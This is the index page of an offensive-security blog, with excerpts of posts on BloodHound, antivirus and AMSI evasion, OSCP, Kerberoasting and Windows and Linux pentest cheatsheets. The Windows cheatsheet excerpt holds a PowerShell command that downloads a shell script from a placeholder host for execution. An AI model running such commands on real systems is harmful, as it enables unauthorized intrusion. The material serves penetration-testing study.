Rethink Security

On Cloud

cloud cloudsecurity research exploits
While flying through some clouds and on my way to enjoy some holidays on the other side of the globe, the thought about the current status of cloud environments is keeping me awake. “It feels like cloud security is still in its infancy!?”, “How long did it actually take to get to the current status of on-premises AD security?”, “What’s the current status of cloud environments?”, “How long did it take to get to this state? Read more...

BloodHound Part II

security tools windows AD
The first part of my BloodHound post was about the setup and usage of the tool. This part will mainly focus on the built-in queries and some small tips and tricks. I think the only way to fully grasp BloodHound is by frequently using it. Built-in queries After dumping our raw data with SharpHound, it’s time to get to work. BH has some built-in queries which help us to get a quick overview of the domain we are facing. Read more...

Cyber Attacks - Threats - Impacts

security hacking german
“The number of attacks on IT and OT infrastructures has increased drastically in recent years.” Statements like this are no longer found only on the relevant news sites on the Internet. The understanding that cyber attacks by criminals are by no means Hollywood fiction is slowly but surely entering people’s awareness. Threats What are actually the main threats that companies, and increasingly cities/municipalities (e.g. Witten and Schwerin), are exposed to? Most of the time, criminals aim to extort ransoms. Read more...

Antivirus Evasion

security hacking av amsi defender bypass
A lot of organizations and companies run antivirus software on their users’ clients. Users should be protected from themselves by preventing the execution of .exe files or scripts. Through GPOs and standard tools of the OS, this can be achieved. In this post we’ll be mainly talking about how to bypass tools like AMSI and Windows Defender. Antivirus Software The first AV software originated back in 1972: the first known virus was the so-called “Creeper Virus”, and Ray Tomlinson wrote the “Reaper”, a program to remove it. Read more...

Journey to OSCP

oscp security hacking certification
There are tons of writeups on the internet from people who completed their OSCP certification, and I guess most of them are written better than this version. But anyway… Let’s jump in. Lab As soon as you get access to the lab, you will notice a lot of machines and different networks, which you can’t access at first. There is a so-called learning path, which suggests a few easy, medium and hard machines and their respective IP addresses. Read more...

Windows Cheatsheet

security cheats tools windows powershell AD privesc
So this is the Windows equivalent of my post about Linux cheatsheets. A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired.team. I also have grepable cheatsheets to download on my GitHub. PowerShell Download from remote Webserver PS> Invoke-WebRequest -Uri "http://<ip>:<port>/shell.ps1" -OutFile "C:\path\file" With the following command, PowerShell downloads the file and executes it immediately Read more...

Linux Cheatsheet

security linux cheats tools privesc
Writing a full hands-on of BloodHound takes more time than I thought, hence Part II is going to be delayed until I’m fully satisfied with the results. So I thought I would share some of my Linux cheats which I use (mostly for enumeration and privilege escalation stuff). A lot of the following commands are from labs, cheatsheets, writeups, from friends and colleagues, trial and error and also copied from famous places like hacktricks and ired. Read more...

BloodHound Part I

security tools windows AD
What is BloodHound? BloodHound is a single page JavaScript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a PowerShell ingestor. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Read more...

Windows Hashes

security windows hash
All the different types of Windows hashes can be confusing sometimes. So to clear things up a little bit, I wrote some key points to help understand what most of the stuff like LM, NTLM and DCC is all about. An excellent writeup on NTLM relaying is from byt3bl33d3r. All the other sources can be found in the footnotes. Hash types LM hashes: in use since OS/2 (ca. 1980); limited character set (everything is in CAPS, with a 7-character limit); when hashing, the PW is padded to 14 characters with zeros and encrypted with DES; very easily crackable, found only in exceptional cases in NTDS. Read more...

Kerberoasting

security hacking windows
Definition: Kerberos Kerberos (/ˈkɜːrbərɒs/) is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. There is also the MIT version of Kerberos, but it’s slightly different from the Microsoft implementation. Kerberos is also the three-headed dog who guards the entrance to the underworld in Greek mythology. Read more...